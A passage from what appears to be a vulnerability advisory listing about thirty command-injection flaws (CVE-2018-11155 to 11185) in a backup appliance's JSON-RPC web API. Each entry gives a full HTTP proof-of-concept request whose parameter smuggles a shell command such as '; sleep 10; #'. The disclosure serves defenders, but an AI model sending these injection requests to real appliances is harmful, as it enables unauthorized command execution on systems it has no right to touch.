Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 133\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"registerDR2000v\",\n \"params\": {\n \"classname\": \"DRLicense\",\n \"dr2000v\": {\n \"LicenseServer\": \"; sleep 10; #\"\n }\n },\n \"id\": 1\n }\n \n\n### 7.13. Command injection in the updateRegisterDR2000v method\n\n[[CVE-2018-11155](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11155>)] The 'updateRegisterDR2000v' subroutine is yet another vulnerable method offered by the license management API.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 139\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"updateRegisterDR2000v\",\n \"params\": {\n \"classname\": \"DRLicense\",\n \"dr2000v\": {\n \"LicenseServer\": \"; sleep 10; #\"\n }\n },\n \"id\": 1\n }\n \n\n### 7.14. Command injection in the email relay host update method\n\n[[CVE-2018-11156](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11156>)] The appliance can be configured to use an external mail server for sending email alerts. The subroutine implementing this functionality was found to be vulnerable to command injection via the 'hostname' request parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 114\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"update\",\n \"params\": {\n \"classname\": \"DREmailRelayHost\",\n \"hostname\": \"'; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.15. Command injection in the join domain method\n\n[[CVE-2018-11157](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11157>)] A DR series system can be joined to a Microsoft Active Directory Services domain. This functionality is exposed by the 'ActiveDirectoryService' module. An attacker can inject system commands in the 'domain' parameter passed to the 'join' method.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 152\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"join\",\n \"params\": {\n \"classname\": \"DRActiveDirectory\",\n \"username\": \"pepe\",\n \"password\": \"pepito\",\n \"domain\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.16. Command injection in the add storage method\n\n[[CVE-2018-11158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11158>)] The storage service module offers support for managing storage devices. The 'add' method was found to be vulnerable.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 106\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"add\",\n \"params\": {\n \"classname\": \"DRStorage\",\n \"service_tag\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.17. Command injection in the get_storage_group_statistics method\n\n[[CVE-2018-11159](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11159>)] The application provides usage statistics for each storage group, such as capacity used, compression status, inode count, etc. In particular, the 'group' parameter passed to the 'get_storage_group_statistics' is not sanitized, allowing system commands to be injected.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 130\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"get_storage_group_statistics\",\n \"params\": {\n \"classname\": \"DRStorageGroup\",\n \"group\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.18. Command injection in the create storage group method\n\n[[CVE-2018-11160](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11160>)] The subroutine that allows adding a new storage group was found to be vulnerable to command injection. An attacker can inject system commands on various request parameters, such as 'Compression_mode' and 'passphrase'.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 130\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"create\",\n \"params\": {\n \"classname\": \"DRStorageGroup\",\n \"group\": {\n \"Compression_mode\": \"; sleep 10; #\"\n }\n },\n \"id\": 1\n }\n \n\n### 7.19. Command injection in the delete storage group method\n\n[[CVE-2018-11161](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11161>)] The 'delete' subroutine in the 'StorageGroupService' module passes user generated input to the 'storage_group' system binary without sanitization, which allows an attacker to inject system commands via the 'name' parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 107\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"delete\",\n \"params\": {\n \"classname\": \"DRStorageGroup\",\n \"name\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.20. Command injection in the update storage group method\n\n[[CVE-2018-11162](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11162>)] Several request parameters are taken from the 'newGroup' dictionary when updating a storage group and used as components of a command string without any sanitization taking place.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 159\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"update\",\n \"params\": {\n \"classname\": \"DRStorageGroup\",\n \"newGroup\": {\n \"Name\": \"; sleep 10; #\",\n \"Compression_mode\": \"pepecomprimido\"\n }\n },\n \"id\": 1\n }\n \n\n### 7.21. Command injection in the set contact information method\n\n[[CVE-2018-11163](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11163>)] The GUI provides functionality to set the administrator contact information. The 'relay_host' parameter is used as provided in the construction of a command line string, therefore allowing attackers to inject system commands.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 143\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"set\",\n \"params\": {\n \"classname\": \"DRContactInformation\",\n \"action\": \"email_alerts\",\n \"relay_host\": \"'; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.22. Command injection in the generate diagnostics method\n\n[[CVE-2018-11164](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11164>)] The diagnostics page allows users to generate diagnostic logs that capture the state of the system. An attacker authenticated within the web application can inject arbitrary system commands by crafting the value of the 'type' request parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 108\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"generate\",\n \"params\": {\n \"classname\": \"DRDiagnostics\",\n \"type\": \"; sleep 15; #\"\n },\n \"id\": 1\n }\n \n\n### 7.23. Command injection in the delete diagnostics method\n\n[[CVE-2018-11165](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11165>)] The 'delete' diagnostics functionality was found to be vulnerable to command injection via the 'file_name' parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 111\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"delete\",\n \"params\": {\n \"classname\": \"DRDiagnostics\",\n \"file_name\": \"; sleep 15; #\"\n },\n \"id\": 1\n }\n \n\n### 7.24. Command injection in the rescan_replica_VTL_container method\n\n[[CVE-2018-11166](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11166>)] The subroutine in charge of rescanning a VTL container replica was found to be vulnerable to command injection via the container name parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5\n Content-Length: 133\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"rescan_replica_VTL_container\",\n \"params\": {\n \"classname\": \"DRReplications\",\n \"cname\": \"; sleep 10; echo \"\n },\n \"id\": 1\n }\n \n\n### 7.25. Command injection in the activate_replica_VTL_container method\n\n[[CVE-2018-11167](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11167>)] The subroutine in charge of activating a VTL container was found to be vulnerable to command injection via the container name parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5\n Content-Length: 136\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"activate_replica_VTL_container\",\n \"params\": {\n \"classname\": \"DRReplications\",\n \"cname\": \"; sleep 10; echo \"\n },\n \"id\": 1\n }\n \n\n### 7.26. Command injection in the deactivate_replica_VTL_container method\n\n[[CVE-2018-11168](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11168>)] The subroutine in charge of deactivating a VTL container was also found to be vulnerable to command injection via the container name parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5\n Content-Length: 138\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"deactivate_replica_VTL_container\",\n \"params\": {\n \"classname\": \"DRReplications\",\n \"cname\": \"; sleep 10; echo \"\n },\n \"id\": 1\n }\n \n\n### 7.27. Command injection in the start replication method\n\n[[CVE-2018-11169](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11169>)] The 'start' replication subroutine implements the logic to perform a replication in an existing storage replication relationship. Arbitrary command execution can be achieved via the 'name' parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 107\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"start\",\n \"params\": {\n \"classname\": \"DRReplications\",\n \"name\": \"'; sleep 15; #\"\n },\n \"id\": 1\n }\n \n\n### 7.28. Command injection in the stop replication method\n\n[[CVE-2018-11170](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11170>)] The 'stop' replication functionality was also found to be vulnerable to command injection.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 106\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"stop\",\n \"params\": {\n \"classname\": \"DRReplications\",\n \"name\": \"'; sleep 15; #\"\n },\n \"id\": 1\n }\n \n\n### 7.29. Command injection in the delete replication method\n\n[[CVE-2018-11171](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11171>)] Deleting a replicaton is yet another way in which authenticated attackers could abuse the 'ReplicationsService' module in order to execute system commands in the context of the web application.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 106\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"delete\",\n \"params\": {\n \"classname\": \"DRReplications\",\n \"name\": \"'; sleep 15; #\"\n },\n \"id\": 1\n }\n \n\n### 7.30. Command injection in the set hostname method\n\n[[CVE-2018-11172](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11172>)] The system hostname can be updated via the 'HostnameService' exposed functionality. Request parameters are not sanitized.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 104\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"set\",\n \"params\": {\n \"classname\": \"DRHostname\",\n \"hostname\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.31. Command injection in the add email alert method\n\n[[CVE-2018-11173](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11173>)] Attackers can inject system commands by requesting to add an email alert and providing a malicious email address containing the payload.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 112\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"add\",\n \"params\": {\n \"classname\": \"DREmailAlerts\",\n \"emailAddress\": \"'; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.32. Command injection in the delete email alert method\n\n[[CVE-2018-11174](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11174>)] Analogous to the email alert 'add' subroutine, the 'delete' email alert counterpart is also vulnerable to command injection because of an unsanitized email address parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 115\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"delete\",\n \"params\": {\n \"classname\": \"DREmailAlerts\",\n \"emailAddress\": \"'; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.33. Command injection in the setBandwidthLimit method\n\n[[CVE-2018-11175](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11175>)] The DR series appliance can be configured to enforce different limits over the network traffic. This functionality is handled by the 'NetworkInterfacesServices' module and its 'setBandwidthLimit' subroutine was found to be vulnerable to command injection.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 154\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"setBandwidthLimit\",\n \"params\": {\n \"classname\": \"DRNetworkInterface\",\n \"bandwidthUnit\": \"default\",\n \"targetIp\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.34. Command injection in the set_passphrase method\n\n[[CVE-2018-11176](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11176>)] A DR series system can be configured to use encryption at rest. The method that sets the passphrase can be abused by attackers to execute arbitrary system commands.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 119\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"set_passphrase\",\n \"params\": {\n \"classname\": \"DREncryption\",\n \"passphrase\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.35. Command injection in the set_encryption_settings method\n\n[[CVE-2018-11177](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11177>)] Different encryption settings can be configured, such as the encryption mode and the key rotation interval. These parameters are taken from the user generated request and used as components of a command string, therefore allowing attackers to inject arbitrary system commands.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 128\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"set_encryption_settings\",\n \"params\": {\n \"classname\": \"DREncryption\",\n \"encryption\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.36. Command injection in the start_filesystem method\n\n[[CVE-2018-11178](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11178>)] Several features implemented in the 'StartupPassphraseService' module were found to be vulnerable to command injection. In particular, the 'start_filesystem' subroutine takes a user supplied passphrase to construct a system command.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 129\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"start_filesystem\",\n \"params\": {\n \"classname\": \"DRStartupPassphrase\",\n \"passphrase\": \"'; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.37. Command injection in the save_configuration method\n\n[[CVE-2018-11179](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11179>)] Saving startup configuration was also found to be prone to command injection issues.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 151\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"save_configuration\",\n \"params\": {\n \"classname\": \"DRStartupPassphrase\",\n \"status\": \"pepito\",\n \"passphrase\": \"'; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.38. Command injection in the cloud portal register method\n\n[[CVE-2018-11180](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11180>)] The 'CloudPortal' module allows to register an agent with the cloud portal system. Its 'register' subroutine was found to be vulnerable to command injection via the 'registrationCode' request parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 120\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"register\",\n \"params\": {\n \"classname\": \"DRCloudPortal\",\n \"registrationCode\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.39. Command injection in the customer portal register method\n\n[[CVE-2018-11181](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11181>)] The subroutine in charge of registering the DR series appliance with the Quest Customer Portal could be abused by an authenticated attacker to execute system commands via a specially crafted 'token' request parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 112\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"register\",\n \"params\": {\n \"classname\": \"DRCustomerPortal\",\n \"token\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.40. Command injection in the customer portal changeManageBtn method\n\n[[CVE-2018-11182](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11182>)] Customer portal integration supports changing the manage button action. This functionality was found to be vulnerable via the 'action' parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 120\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"changeManageBtn\",\n \"params\": {\n \"classname\": \"DRCustomerPortal\",\n \"action\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.41. Command injection in the set DNS method\n\n[[CVE-2018-11183](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11183>)] The 'set' subroutine in the 'DnsService' module allows users to configure the DNS servers used. When setting new DNS server configuration, several user supplied parameters are used to build a command line string without applying any sanitization, therefore leading to command injection.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 101\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"set\",\n \"params\": {\n \"classname\": \"DRDns\",\n \"dns_suffix\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.42. Command injection in the get usage method\n\n[[CVE-2018-11184](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11184>)] The 'UsageService' module allows administrators to monitor system usage. A single subroutine processes the user's query and returns the corresponding statistics.\n\nThe following proof of concept exploits the 'usage' type.\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 114\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"get\",\n \"params\": {\n \"classname\": \"DRUsage\",\n \"type\": \"usage\",\n \"width\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.43. Command injection in the support portal register method\n\n[[CVE-2018-11185](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11185>)] DR series systems can be registered with the Quest Support Portal. Registered systems collect certain information such as operational statistics, performance metrics, 